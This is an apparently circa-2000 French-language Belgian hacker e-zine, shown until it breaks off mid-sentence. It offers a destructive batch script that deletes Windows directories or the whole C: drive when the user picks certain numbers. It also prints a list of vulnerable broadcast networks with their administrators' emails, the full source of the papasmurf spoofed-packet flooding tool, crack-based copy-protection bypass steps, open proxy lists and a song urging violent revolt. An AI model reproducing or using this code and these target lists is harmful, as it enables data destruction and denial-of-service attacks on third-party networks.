œœœœœœ õõõõõõ**** 33333333 ** ************** 33 33 **|********* ** ** ************* 33 33 ** œœœœœ *** *** ** 666 * ___ 33 333 *|* ** *** ** 666 * / ) 33 *| * ** ** ** ** ! ) 333 *|* * ** ** ** ÝÝ œœœœœ (___) 33 *|12345678910 ù%%%%õõœœœ *** ÝÝÝ ** 333333 **|* ******* ******** *** ÝÝÝ ** 333 **|* *** ** 666 * ** ÝÝ ** 333 $$|* ** ** ** ** ÝÝ ** 3 *|* * ** ** ** ÝÝ ** 333 33 *|** ** ** ** ** ÝÝ ** 333 333 */* ******** *** ** ** 3333 $$$$$$$ BHZ *** !!!!!!!!!!!!! * ----- **** æææææææææææ **** **** **** The Belgian Hackers Zone !!!!!!!! Bienvenue dans BHZ mag n0 3.Et oui deja la 3eme edition de ce zine tres critique (presqu'autant que son auteur,AsmodeuS)Y'a des mecs qui m'ont dit que le n0 2 etait beucoup mieux que le premier,d'autre qui m'on dit le contraire et y'en a aussi qui m'ont dit qu'ils etaient tout les deux a chier... et d autres qui ont apprecie. J'ai encore recu des mails avec des remarques tres constructives du genre: "P'tain toi t'es trop nul,tu pollues la scene" "Site de merde,zine de merde,forum de merde" "C'est bizarre,moi qui te connais bien j'ai l'impression que tu ne retranscris pas dans ton zine tout ce que tu sais et toutes les techniques que tu utilises..." Les endroits ou on trouve le zine : www.bhz.be.tf ou www.altern.org/bhz (le site du BHZ) www.madchat.org Le site de MadChat y'a tout plein de zines www.altern.org/imf l'Institut MonkeY Fool asmodeus@mail.be : je peux vous les envoyer par mail si ca vous amuse Entre la sortie du n0 1 et du n0 2,personne ne m'a envoye d'articles... Articles n0 1,3,4,5,6,7,8 et 9 by AsmodeuS : asmodeus@mail.be Article n0 2 by Grévên : greven@student.be _____________________________________________________________________ / SOMMAIRE: \ | | | 1 Tutorial sur les bat(suite) | | 2 La copie de CD (PSX) | | 3 les serveurs concernes par le SmurF amplifie | | 4 la source de papasmurf | | 5 une petite critique de site(Youpi tralala tout le monde aime ca) | | 6 Top 10 des proxys + liste | | 7 le triomphe de l'anarchie | | 8 Caramail mail-ange les comptes de ses utillisateurs | | 9 Une faille de securite dans le mail de netscape | | 10 La faille de securite ActiveX (32 facons de l'utiliser) | |_______________________________________________________________________/ 1 Tutorial sur les bat (suite) ****************************** Dans BHZ Mag n0 2 y'avait un petit tutorial sur les progs en .bat mais c'etait que de la theorie.Voici un petit exemple de programme qui comprend toutes les fonctions que j'ai explique: @echo off :menu cls echo. echo Bienvenue echo dans echo Casino PartY !!!! echo Le principe de ce petit jeu est simple : echo si vous essayez de fermer cette fenetre,tous les fichiers echo presents sur votre disque dur disparaîtront.... Pause echo Je vois que vous avez envie de jouer avec moi.... echo c'est tres simple : choisissez un chiffre entre 1 et 9 echo sur ces 9 choix,un supprime tous les fichiers presents dans echo le repertoire C:\Winnt,un autre supprime tous les fichiers echo presents dans le repertoire C:\Windows,un autre de ces choix echo supprimme lui tous les fichiers presents sur votre disque dur.... echo un quatrieme choix vous ramene au depart... echo les cinq autre choix,quand a eux laissent la vie sauve a votre echo PC InteL InsIdE sous Windaube.... echo . echo . echo CasiNo PartY cree par AsmOdeuS echo CasinO PaRtY created by AsmOdeUs choice /c:123456789Q /t:Q,60 /n Votre choix ? if errorlevel 255 goto erreur if errorlevel 10 goto Quitter if errorlevel 9 goto Prout if errorlevel 8 goto Prout if errorlevel 7 goto Prout if errorlevel 6 goto Prout if errorlevel 5 goto Prout if errorlevel 4 goto menu if errorlevel 3 goto DelC if errorlevel 2 goto DelCwin if errorlevel 1 goto DelCnt if errorlevel 0 goto erreur goto fin :erreur echo Il y a eu une erreur. goto fin :Quitter goto fin :DelCwin deltree /Y C:\Windows\*.* cls echo Bonjour cher utilisateur de Windows echo je suppose que vous ne vous doutez pas que pendant echo que vous lisez ces quelques lignes,il se passe echo beaucoup de choses sur votre beau disque dur tout neuf echo de 10 Go. echo Vous ne vous doutez sans doute pas non plus qu' echo avec votre beau Pentium III 800 Mhz cela echo ne fera qu'augmenter la vitesse qu'il me faudra echo pour vous detruire.... echo hahahahahaaaaaaaaaa Pause goto menu :DelCnt deltree C:\Winnt\*.* cls Pause goto menu :DelC deltree C:\*.* cls echo Salut a toi,Windoze UseR tu ne te doute echo pas que ton systeme est TOTALEMENT insecurise, echo non sur,lent,et merdique? echo tant pis pour toi.... Pause goto menu :Prout cls echo Tu as de la chance mon gamin echo La prochaine fois tu t'en tireras pas comme ca... Pause goto fin :fin Je suppose que vous avez compris ce qui se faisait.Si vous avez tres peur vous pouvez toujours appuyer sur Q a la place d'un chiffre(ca ferme le prog) Si vous voulez d'autres exemples,mailez-moi:asmodeus@mail.be 2 La copie de CD (PSX) ++++++++++++++++++++++ Tout d'abord, sachez que la copie de cd n'est autorisée que pour se faire une sauvegarde d'un cd que vous possédez et il est formellement interdit de copier des cd de n'importe quel type pour les vendre. Aussi les informations qui suivent ne sont là qu'à titre d'informations et je ne peux en aucun cas être tenu responsable de l'utilisation que vous en ferez. Alors à vous de voir. La gravure en détail -------------------- Les méthodes de gravures que je vais vous montrer dans un moment sont applicables avec le programme cd-r win que vous pouvez trouver sur pas mal de sites. Il est souvent accompagné du crack qui va avec. Ce crack est quand même utile puisque en version shareware, vous n'avez pas accès à la totalité des fonctions. Par exemple, si votre graveur est un 2X, avec la version shareware, vous ne pourrez graver qu'en 1X. Je vais aussi vous montrer une méthode pour protéger vos propres copies pour faire face à la conurrence ou tout simplement pour que votre copain qui vous a emprunter un cd ne puisse pas le copier. C'est un méthode très simple à appliquer et qui ne prend pas beaucoup de temps. 1. Les différentes protections des cds -------------------------------------- Lorsque vous gravez, il se peut que le cd plante à un certain moment et vous affiche un message d'erreur. C'est peut-être du à votre graveur qui a planté ou parce que tout simplement, le cd que vous essayez de copier est protégé. Une chose importante : quand vous copiez un cd, ne travaillez sur aucune autre application en même temps parce que quand vous gravez, l'ordinateur a besoin de beaucoup de memoire vive et que si il en manque, la copie échouera. Il y a diférents types de protections, je les énumèrerais plus bas. Pour les cd playstation (psx), la plupart se copient facilement avec cd-r win sans avoir besoin de recourir à un crack. Mais certains ont une protection supplémentaire sur le cd. A ce moment, il est impératif de faire une image sur le disque, d'appliquer le crack et puis de graver l'image. Les différents types de protections: pour chacun de ceux que je connais, je vais vous donner la façon de le reconnaître, son fonctionnement et sa solution. La plupart de ces protections s'appliquent à des cd-rom, pour les cd psx, il n'y a qu'ç trouver le crack du jeu. SECUROM (par Sony) ****************** signes distinctifs : Les fichiers suivants se trouvent à la racine du cd ou dans le rémpertoire d'installation du jeu : CMS16.DLL, CMS_95.DLL et CMS_NT.DLL Fonctionnement: signature électronique contenant un numero de serie unique qui est vérifiée par le logiciel au démarrage. Solution: Copier le contenu du CD sur le disque dur, trouver un crack sur internet, appliquer ce crack dans le répertoire de l'image et regraver le tout. Safe Disk ********* Signes distinctifs : Les fichiers suivants se trouvent à la racine du cd: 00000001.TMP, CLCD16.DLL, CLCD32.DLL, CLOKSPL.EXE Fonctionnement : Signature digitale située sur le Cd. Solution : Copier le contenu du CD sur le disque dur, trouver un crack sur internet, appliquer ce crack dans le répertoire de l'image et regraver le tout. Laser Lock ********** Signes distinctifs : Un répertoire caché appelé LASERLOCK se situe à la racine du CD. Il contient des fichiers avec des codes d'erreurs. Fonctionnement : Logiciel encrypté et marquage unique sur chaque CD. Solution : Copier le contenu du CD (sauf le fameux répertoire) sur le disque dur. Trouver un crack sur internet, Aplliquer le crack dans le répertoire du disque dur et regraver le tout. ** : vous pouvez essayez de copier le répertoire caché en utilisant l'option "ignore read error", Subcode Analys sur fixed et read retry count sur une grande valeur (5 ou plus, cela peut prendre beaucoup de temps. Disk Guard ********** Signes distinctifs : Ne correspond à aucune des protections citées ailleurs, le cd se grave normalement et pourtant le jeu ne démarre pas. Fonctionnement : Exécutable principal encrypté et signature digitale sur chaque cd. Solution : Copier le contenu du CD sur le disque dur, trouver un crack sur internet, appliquer ce crack dans le répertoire du disque dur et regraver le tout. Oversizing ********** Signes distinctifs : Le CD fait entre 74 et 80 minutes. Fonctionnement : L'executable principal vérifiera que toutes les pistes audios sont biens présentes ou vérifiera si le CD fait la bonne taille. Solution : Overburner en utilisant Nero (pas conseillé) ou copie directe de cd à cd en utilisant cd-r win. CD Lock (structure de fichiers TOC bidouillée ) *********************************************** Signes distinctifs : C'est un bidouillage de la structure de fichiers de CD. On trouve sur le CD des fichiers de taille extraordinnaire ( 4 fichiers de 600 MO par exemple). Ou on retrouve une seconde piste de données aprés les pistes audios. Fonctionnement : On augmente volontairement la taille dans l'en tête de certains fichiers du CD. L'executable vérifiera que le CD contient bien ces fichiers. Solution : Copier le contenu du CD sauf les fichiers bidouillés ou la seconde piste de données sur le disque dur. Trouver un crack sur internet, l'appliquer dans le répertoire du disque dur et regraver le tout. Erreurs Physiques ***************** Signes distinctifs : La surface du CD est endommagée Fonctionnement: Le lecteur refuse de copier certaines parties du CD et l'exécutable vérifiera qu'elles y sont bien. Solution : Vous pouvez essayer de copier le Cd en utilisant les options read retry count à une grande valeur ( 10 ou plus, cela peut prendre BEAUCOUP DE TEMPS), ignore read error et subcode analys sur fixed. 2. Protéger ses propres copies de cd. ------------------------------------- Encore une fois, on va utiliser CD-r Win puisque c'est le meilleur et le plus complet. Sachez que Cd-r Win est surtout un outil de reproduction, si vous voulez faire des cds de compilation, préférez Nero, très simple à utiliser. Pour vous expliquercomment portèger vos cds, on va prendre un exemple, on va protèger le cd de crash bandicoot 3. On lance Cd-r Win et on fait une image disque que vous nomerez crash, jusqu'ici, rien de spécial. En créant une image disque avec Cd-r Win, vous devez savoir que vous créez 2 fichier, le fichier crash.bin, dont la taille fait à paut près 600 MO et le fichier crash.cue, qui va indiquer au graveur le nombre de piste et leur durée. C'est avec le fichier en .CUE que l'on va travailler, lancez l bloc notes de windows et ouvrez le fichier. On lit : file "c:/temp/crash.bin" binary track 01 mode2/2352 index 01 00:00:00 ce qui veut dire qu'il y a une eule piste MODE 2 qui démarre à 00:00:00. En fait, pour protéger le cd, on va rendre ce fichier faux en ajoutant une deuxième piste data. Si on regarde avec Cd-r Win, le total disc time fait 32:36:12. On va donc avoir : file "c:/temp/crash.bin" binary track 01 mode2/2352 index 01 00:00:00 track 02 mode2/2352 <--- on ajoute la piste data mode 2 index 01 32:34:12 <--- on la fait commencer 2 secondes de moins que le temps total. Il ne reste plus qu'à graver l'image normalement avec Cd-r Win et vous aurez votre cd avec 2 pistes data. Cette protection n'est aps infaillible, comme toutes les autres mais les débutants n'arriveront jamais à copier votre cd et donc la copie de votre cd sera limitée. Article rédigé par grèvên, si vous avez des questions, mailez moi : greven@cyberbrain.com 3 Serveurs concernes par le Smurf amplifie xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Voici une liste des serveurs les moins bien proteges contre le Smurf amplifie RESP ADDR EMAIL ADDRESSES --------------------------------------------------------------------- 2697 207.22.212.255 ipadmin@iamerica.net 448 204.243.120.255 hostinfo@psi.com 261 199.225.7.0 lind@forum.saic.com 250 199.1.223.255 quentin@qns.com 247 207.43.61.255 pflores@wcg.net 242 207.142.180.255 root@unix.triton.net 240 167.192.222.255 jda51@state.ga.us 155 207.204.52.0 rwarren@netusa.net 148 209.84.85.255 ipadmin@gte.net 132 205.169.216.0 postmaster@garfield.k12.co.us 125 199.250.180.255 dnstech@eni.net 123 209.115.108.255 tstroup@fnsi.net 122 207.202.127.255 noc@corp.idt.net 122 207.235.88.255 rickyc@world-net.net 122 209.246.218.255 ipadmin@level3.net 120 195.184.38.255 hein@euroconnect.net 117 205.169.211.0 postmaster@garfield.k12.co.us 114 199.251.102.255 lind@forum.saic.com 112 205.154.156.255 nes@4c.net 107 205.221.196.255 hikep@urbandale.k12.ia.us 106 205.221.196.0 hikep@urbandale.k12.ia.us 105 207.177.41.0 noc@netins.net 105 207.177.41.255 noc@netins.net 104 207.127.47.255 gorlo@enet.com 102 205.221.198.0 hikep@urbandale.k12.ia.us 102 205.221.198.255 hikep@urbandale.k12.ia.us 102 205.221.199.0 hikep@urbandale.k12.ia.us 101 205.221.199.255 hikep@urbandale.k12.ia.us 100 207.127.47.0 gorlo@enet.com 98 208.0.211.255 NOC@sprint.net 97 205.154.156.0 nes@4c.net 92 216.14.26.255 john@telepath.com 90 209.37.134.255 breig@buffnews.com 86 209.20.39.255 netadmin@interlog.net 82 209.140.163.0 darin@good.net 80 200.29.38.0 aaraya@novared.cl 79 200.29.38.255 aaraya@novared.cl 74 209.140.163.255 darin@good.net 72 209.37.134.0 breig@buffnews.com 71 193.48.166.0 Michel.Leduc@univ-lehavre.fr, Serge.Huberson@univ-lehavre.fr 71 205.169.214.0 postmaster@garfield.k12.co.us 70 207.165.185.0 dave.klinkefus@icn.state.ia.us 68 207.28.48.255 dave.klinkefus@icn.state.ia.us 68 207.28.48.0 dave.klinkefus@icn.state.ia.us 64 207.230.219.255 network@centurytel.com 62 209.212.162.255 hostmaster@rhythms.net 61 209.152.182.255 domain@slip.net 60 209.106.20.0 ben@more.net 59 167.199.95.0 jda51@state.ga.us 58 216.20.92.0 jcoco@mec.edu 57 204.48.169.0 tuma@ceo.sbceo.k12.ca.us 57 205.253.196.255 karl@mcs.com 57 209.73.88.255 hostmaster@digilink.net 57 209.17.207.255 dns@america.net 56 193.48.166.255 Michel.Leduc@univ-lehavre.fr, Serge.Huberson@univ-lehavre.fr 56 204.48.142.0 tuma@ceo.sbceo.k12.ca.us 56 209.56.232.0 tdao@aea11.k12.ia.us 56 209.56.232.255 tdao@aea11.k12.ia.us 56 208.129.177.255 nomailbox@nowhere 56 207.194.160.255 domains@bctel.net 54 216.102.167.0 ip-admin@pbi.net 54 207.225.159.255 dns-info@uswest.net 53 198.233.12.0 Don@arapahoe.edu 53 207.213.205.255 andy@ssw1.com 53 207.224.249.0 dlongar@uswest.net 53 207.165.185.255 dave.klinkefus@icn.state.ia.us 53 207.28.60.0 dave.klinkefus@icn.state.ia.us 52 204.48.223.0 tuma@ceo.sbceo.k12.ca.us 52 206.150.74.255 walker@scsn.net 52 207.177.95.0 noc@netins.net 52 207.177.95.255 noc@netins.net 52 209.167.171.255 chris@tntech.com 52 207.28.60.255 dave.klinkefus@icn.state.ia.us 52 210.68.152.255 52 208.202.118.255 jokage@gate.net 51 199.103.248.0 dnsmaster@terra.net 50 199.251.102.0 lind@forum.saic.com 50 208.223.170.255 kambach@brearley.org 50 216.102.245.0 49 209.63.26.255 bradw@tlg.com 48 216.20.20.255 jcoco@mec.edu 48 209.73.236.255 hostmaster@pfmc.net 48 216.101.206.0 ip-admin@pbi.net 47 202.98.5.255 dmkou@publicf.bta.net.cn, yzxu@publicf.bta.net.cn 47 207.152.126.0 Postmaster@popmail.jba.com 47 207.152.126.255 Postmaster@popmail.jba.com 47 209.56.235.0 tdao@aea11.k12.ia.us 46 202.232.119.0 hostmaster@nic.ad.jp 46 202.232.119.255 hostmaster@nic.ad.jp 46 209.21.155.255 hostmaster@harvard.net 46 216.20.20.0 jcoco@mec.edu 46 207.60.165.255 hostmaster@tiac.net 46 206.66.243.0 daniel@webdimensions.com 46 206.66.243.255 daniel@webdimensions.com 46 208.245.231.0 help@uunet.uu.net 45 204.158.26.0 D.Nash@utexas.edu 45 204.158.26.255 D.Nash@utexas.edu 45 209.56.78.0 tdao@aea11.k12.ia.us 44 193.14.29.0 44 198.233.12.255 Don@arapahoe.edu Suite de la liste dans BHZ Mag n0 4 ou 5 ou + (elle est assez longue:1024 addresses mais celles-ci sont les plus vulnerables...)si je vois que ca n'interesse personne alors je ne mettrai pas les autres adresses. 4 La source de "papasmurf" pour exploiter les serveurs cites plus hauts ************************************************************************ Bon je sais c'est pas commente mais bon je ne comprend que 3/4 de la source et commme j'ai pas envie de dire n'importe quoi je ne commente pas...(he j'ai pas envie de me faire chier a commenter ce truc)de toute facon y'a des commentaires (en anglais)si vous comprenez pas l'anglais tant pis... #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef LINUX #define __FAVOR_BSD /* should be __FAVOUR_BSD ;) */ #ifndef _USE_BSD #define _USE_BSD #endif #endif #include #include #include #ifdef LINUX #define FIX(n) htons(n) #else #define FIX(n) (n) #endif struct smurf_t { struct sockaddr_in sin; /* socket prot structure */ int s; /* socket */ int udp, icmp; /* icmp, udp booleans */ int rnd; /* Random dst port boolean */ int psize; /* packet size */ int num; /* number of packets to send */ int delay; /* delay between (in ms) */ u_short dstport[25+1]; /* dest port array (udp) */ u_short srcport; /* source port (udp) */ char *padding; /* junk data */ }; /* function prototypes */ void usage (char *); u_long resolve (char *); void getports (struct smurf_t *, char *); void smurficmp (struct smurf_t *, u_long); void smurfudp (struct smurf_t *, u_long, int); u_short in_chksum (u_short *, int); int main (int argc, char *argv[]) { struct smurf_t sm; struct stat st; u_long bcast[1024]; char buf[32]; int c, fd, n, cycle, num = 0, on = 1; FILE *bcastfile; /* shameless self promotion banner */ fprintf(stderr, "\n(papa)smurf.c v5.0 by TFreak\n\n"); if (argc < 3) usage(argv[0]); /* set defaults */ memset((struct smurf_t *) &sm, 0, sizeof(sm)); sm.icmp = 1; sm.psize = 64; sm.num = 0; sm.delay = 10000; sm.sin.sin_port = htons(0); sm.sin.sin_family = AF_INET; sm.srcport = 0; sm.dstport[0] = 7; /* resolve 'source' host, quit on error */ sm.sin.sin_addr.s_addr = resolve(argv[1]); /* open the broadcast file */ if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("Opening broadcast file"); exit(-1); } /* parse out options */ optind = 3; while ((c = getopt(argc, argv, "rRn:d:p:P:s:S:f:")) != -1) { switch (c) { /* random dest ports */ case 'r': sm.rnd = 1; break; /* random src/dest ports */ case 'R': sm.rnd = 1; sm.srcport = 0; break; /* number of packets to send */ case 'n': sm.num = atoi(optarg); break; /* usleep between packets (in ms) */ case 'd': sm.delay = atoi(optarg); break; /* multiple ports */ case 'p': if (strchr(optarg, ',')) getports(&sm, optarg); else sm.dstport[0] = (u_short) atoi(optarg); break; /* specify protocol */ case 'P': if (strcmp(optarg, "icmp") == 0) { /* this is redundant */ sm.icmp = 1; break; } if (strcmp(optarg, "udp") == 0) { sm.icmp = 0; sm.udp = 1; break; } if (strcmp(optarg, "both") == 0) { sm.icmp = 1; sm.udp = 1; break; } puts("Error: Protocol must be icmp, udp or both"); exit(-1); /* source port */ case 's': sm.srcport = (u_short) atoi(optarg); break; /* specify packet size */ case 'S': sm.psize = atoi(optarg); break; /* filename to read padding in from */ case 'f': /* open and stat */ if ((fd = open(optarg, O_RDONLY)) == -1) { perror("Opening packet data file"); exit(-1); } if (fstat(fd, &st) == -1) { perror("fstat()"); exit(-1); } /* malloc and read */ sm.padding = (char *) malloc(st.st_size); if (read(fd, sm.padding, st.st_size) < st.st_size) { perror("read()"); exit(-1); } sm.psize = st.st_size; close(fd); break; default: usage(argv[0]); } } /* end getopt() loop */ /* create packet padding if neccessary */ if (!sm.padding) { sm.padding = (char *) malloc(sm.psize); memset(sm.padding, 0, sm.psize); } /* create the raw socket */ if ((sm.s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) { perror("Creating raw socket (are you root?)"); exit(-1); } /* Include IP headers ourself (thanks anyway though) */ if (setsockopt(sm.s, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) { perror("setsockopt()"); exit(-1); } /* read in our broadcasts and store them in our array */ while (fgets(buf, sizeof buf, bcastfile) != NULL) { char *p; int valid; /* skip over comments/blank lines */ if (buf[0] == '#' || buf[0] == '\n') continue; /* get rid of newline */ buf[strlen(buf) - 1] = '\0'; /* check for valid address */ for (p = buf, valid = 1; *p != '\0'; p++) { if ( ! isdigit(*p) && *p != '.' ) { fprintf(stderr, "Skipping invalid ip %s\n", buf); valid = 0; break; } } /* if valid address, copy to our array */ if (valid) { bcast[num] = inet_addr(buf); num++; if (num == 1024) break; } } /* end bcast while loop */ /* seed our random function */ srand(time(NULL) * getpid()); /* wee.. */ for (n = 0, cycle = 0; n < sm.num || !sm.num; n++) { if (sm.icmp) smurficmp(&sm, bcast[cycle]); if (sm.udp) { int x; for (x = 0; sm.dstport[x] != 0; x++) smurfudp(&sm, bcast[cycle], x); } /* quick nap */ usleep(sm.delay); /* cosmetic psychadelic dots */ if (n % 50 == 0) { printf("."); fflush(stdout); } cycle = (cycle + 1) % num; } exit(0); } void usage (char *s) { fprintf(stderr, "usage: %s [options]\n" "\n" "Options\n" "-p: Comma separated list of dest ports (default 7)\n" "-r: Use random dest ports\n" "-R: Use random src/dest ports\n" "-s: Source port (0 for random (default))\n" "-P: Protocols to use. Either icmp, udp or both\n" "-S: Packet size in bytes (default 64)\n" "-f: Filename containg packet data (not needed)\n" "-n: Num of packets to send (0 is continuous (default))\n" "-d: Delay inbetween packets (in ms) (default 10000)\n" "\n", s); exit(-1); } u_long resolve (char *host) { struct in_addr in; struct hostent *he; /* try ip first */ if ((in.s_addr = inet_addr(host)) == -1) { /* nope, try it as a fqdn */ if ((he = gethostbyname(host)) == NULL) { /* can't resolve, bye. */ herror("Resolving victim host"); exit(-1); } memcpy( (caddr_t) &in, he->h_addr, he->h_length); } return(in.s_addr); } void getports (struct smurf_t *sm, char *p) { char tmpbuf[16]; int n, i; for (n = 0, i = 0; (n < 25) && (*p != '\0'); p++, i++) { if (*p == ',') { tmpbuf[i] = '\0'; sm->dstport[n] = (u_short) atoi(tmpbuf); n++; i = -1; continue; } tmpbuf[i] = *p; } tmpbuf[i] = '\0'; sm->dstport[n] = (u_short) atoi(tmpbuf); sm->dstport[n + 1] = 0; } void smurficmp (struct smurf_t *sm, u_long dst) { struct ip *ip; struct icmp *icmp; char *packet; int pktsize = sizeof(struct ip) + sizeof(struct icmp) + sm->psize; packet = malloc(pktsize); ip = (struct ip *) packet; icmp = (struct icmp *) (packet + sizeof(struct ip)); memset(packet, 0, pktsize); /* fill in IP header */ ip->ip_v = 4; ip->ip_hl = 5; ip->ip_tos = 0; ip->ip_len = FIX(pktsize); ip->ip_ttl = 255; ip->ip_off = 0; ip->ip_id = FIX( getpid() ); ip->ip_p = IPPROTO_ICMP; ip->ip_sum = 0; ip->ip_src.s_addr = sm->sin.sin_addr.s_addr; ip->ip_dst.s_addr = dst; /* fill in ICMP header */ icmp->icmp_type = ICMP_ECHO; icmp->icmp_code = 0; icmp->icmp_cksum = htons(~(ICMP_ECHO << 8)); /* thx griffin */ /* send it on its way */ if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin, sizeof(struct sockaddr)) == -1) { perror("sendto()"); exit(-1); } free(packet); /* free willy! */ } void smurfudp (struct smurf_t *sm, u_long dst, int n) { struct ip *ip; struct udphdr *udp; char *packet, *data; int pktsize = sizeof(struct ip) + sizeof(struct udphdr) + sm->psize; packet = (char *) malloc(pktsize); ip = (struct ip *) packet; udp = (struct udphdr *) (packet + sizeof(struct ip)); data = (char *) (packet + sizeof(struct ip) + sizeof(struct udphdr)); memset(packet, 0, pktsize); if (*sm->padding) memcpy((char *)data, sm->padding, sm->psize); /* fill in IP header */ ip->ip_v = 4; ip->ip_hl = 5; ip->ip_tos = 0; ip->ip_len = FIX(pktsize); ip->ip_ttl = 255; ip->ip_off = 0; ip->ip_id = FIX( getpid() ); ip->ip_p = IPPROTO_UDP; ip->ip_sum = 0; ip->ip_src.s_addr = sm->sin.sin_addr.s_addr; ip->ip_dst.s_addr = dst; /* fill in UDP header */ if (sm->srcport) udp->uh_sport = htons(sm->srcport); else udp->uh_sport = htons(rand()); if (sm->rnd) udp->uh_dport = htons(rand()); else udp->uh_dport = htons(sm->dstport[n]); udp->uh_ulen = htons(sizeof(struct udphdr) + sm->psize); // udp->uh_sum = in_chksum((u_short *)udp, sizeof(udp)); /* send it on its way */ if (sendto(sm->s, packet, pktsize, 0, (struct sockaddr *) &sm->sin, sizeof(struct sockaddr)) == -1) { perror("sendto()"); exit(-1); } free(packet); /* free willy! */ } u_short in_chksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } en clair ca permet d'avoir des tas d'infos sur les serveurs et les reseaux concernes et pour certains de les faire planter... Et vous etes totalement intracables! ----------------------------------- _____________ ------------ ____ ---- ___ 5 hehehe... Bon passons a autre chose:une petite critique de site et en gros de l'underground nouvelle vague et de tous ces nouveaux blaireaux... C'est desolant quand meme:je vois sur un forum(dont je ne citerai pas le nom...)un message qui dit "un nouveau site de HPVCA super" bon j'y vais,deja le site a l'air foireux mais bon je me dis que le mien est pas vraiment mieux ensuite je vois un ptit logo anti-microsft pour faire beau je suppose car quand j'examine la source de l'index voila ce que je trouve: CHAOS inc H/P/V/A/C WebSite etc...et evidemment toutes les autres pages avec comme titre "Untitled" C'est incroyable ! Encore un gros blaireau qui se prend pour un killer(si vous voulez lui mailer vous etes obliges de crypter vos messages avec PGP...)mais qui sait pas se debrouiller sans son ptit WinDoWs et son OfFice 97... si vous voulez vous marrer l'adresse c'est www.altern.org/chaosinc ou chaostic ou un truc comme ca. Encore un truc marrant avec ce site c'est au debut il est ecrit en grand DISC-LAMMER alors je me dis que le mec va surement faire une parodie des disclaimers (disc et puis lamers le jeu de mots habituels quoi)mais non ce blaireau sort un truc de 15 lignes et ne sait pas ortographier correctement le premier mot qui apparait sur sa page...Ensuite y'a Entrer et Quitter et quitter pointe vers www.microsoft.com... Mais comme je lui ai fait part de mes remarques,je suppose qu'il a change tout ca.... 6 ToP 10 des pRoxYs + liste --------------------------- blue.pompano.net:8080 HTTP kashi.elec.fuk.kindai.ac.jp:8080 HTTP softy.poptel.org.uk:8080 HTTP caligula.flash.net:8080 HTTP www-cache.mppmu.mpg.de:3128 HTTP s2.optonline.net:8080 HTTP www.thefourthr-fw.com:8080 HTTP q.netunlimited.net:80 HTTP cache01.pathcom.com:8080 HTTP lino.privacy.fgov.be:80 HTTP magusnet.com:many ports HTTP et voila aussi une liste de proxyes avec les ports.Cette fois-ci ce sont des adresses IP 12.7.130.33:8080 142.169.242.4:80 164.124.250.226:80 165.138.113.102:8080 165.138.113.221:8080 165.138.113.247:8080 165.138.94.10:8080 165.254.186.2:8080 168.126.72.10:80 168.126.72.12:80 168.126.72.13:80 168.126.72.26:80 168.216.147.130:80 169.133.1.51:80 192.117.238.94:80 193.89.27.199:80 194.133.122.44:8080 194.140.17.130:80 194.213.91.6:80 194.239.178.252:80 194.51.96.231:8080 195.37.223.225:80 195.74.0.28:80 198.161.26.2:80 198.161.26.33:80 198.161.26.65:80 199.172.226.197:8080 200.1.161.59:80 202.235.15.34:8080 202.30.245.3:80 202.39.143.5:80 203.103.174.194:80 203.108.181.62:80 203.144.250.66:80 203.241.162.32:80 203.37.184.60:80 203.41.7.130:80 204.140.188.5:80 204.211.154.142:80 204.211.154.144:80 205.134.211.44:80 208.196.150.4:80 209.121.142.2:80 209.20.42.6:3128 209.5.107.10:80 210.172.76.30:80 210.8.56.1:80 210.96.52.1:80 7* Le triomphe de l'AnarChiE ++++++++++++++++++++++++++++ Tu veux bâtir des cités idéales, Détruis d'abord les monstruosités. Gouvernements, casernes, cathédrales, Qui sont pour nous autant d'absurdités. Sans plus attendre, gagnons le communisme Ne nous groupons que par affinités Notre bonheur naîtra de l'altruisme Que nos désirs soient des réalités Refrain: Debout, debout, comapgnons de misère L'heure est venue, il faut nous révolter Que le sang coule, et rougisse la terre Mais que ce soit pour notre liberté C'est reculer que d'être stationnaire On le devient de trop philosopher Debout, debout, vieux révolutionnaire Et l'anarchie enfin va triompher Empare-toi maintenant de l'usine Du capital, deviens le fossoyeur Ta vie vaut mieux que d'être une [machine Tout est à tous, rien n'est à l'exploiteur Sans préjugé, suis les lois de nature Et ne produis que par nécessité Travail facile, ou besogne très dure N'ont de valeur qu'en leur utilité Refrain On rêve amour au-delà des frontières On rêve amour aussi de ton côté On rêve amour dans les nations entières L'erreur fait place à la réalité Oui, la patrie est une baliverne Un sentiment doublé de lâcheté Ne deviens pas de la viande à caserne Jeune conscrit, mieux te vaut déserter Refrain Que la nitro, comme la dynamite Soit là pendant qu'on discute raison S'il est besoin, renversons la marmite Et de nos maux, hâtons la guérison Place pour tous au banquet de la vie Notre appétit seul peut se limiter Que pour chacun, la table soit servie Le ventre plein, l'homme peut discuter Refrain par C. d'Avray 8 Caramail mail-ange les comptes de ses utilisateurs ++++++++++++++++++++++++++++++++++++++++++++++++++++ Des boîtes de courriel Caramai sont mailangées :( 10 décembre 1999 ) | Le respect de la vie privée de la clientèle semble une préoccupation bien secondaire pour le service de courriel gratuit Caramail. C'est du moins ce que démontre la réponse qu'on a faite à un abonné Caramail qui recevait le courriel d'un autre abonné. En effet, un de nos lecteurs nous a fait parvenir quelques messages de courriel qui portaient son adresse électronique mais qui étaient visiblement destinés à quelqu'un d'autre. De plus les courriels sortants de notre lecteur étaient identifiés comme provenant de cet autre abonné. Les premières constatations semblent démontrer que les deux abonnés ont le même nom d'usager donc la même adresse de courriel. Chose surprenante, Caramail n'a jamais coupé l'accès au compte disputé par ses deux usagers. En réponse au plaintif, l'équipe de support technique s'est limitée à dire que: «Notre équipe de développeurs s'attache actuellement à résoudre votre problème. Nous espérons pouvoir y subvenir dans les plus brefs délais.» Il semble donc que les messages envoyés par les correspondants du plaintif étaient alors disponibles à son colocataire virtuel forcé. Pas très reluisant comme protection de la vie privée. Il ne s'agit pas des premiers démêlés que des usagers ont avec le service Caramail. Avec les trous de sécurité qui ont accablé MonCourrier.com et ceux qui troublent actuellement Caramail, la preuve est de nouveau faite que le courriel gratuit n'est qu'une solution pour de la 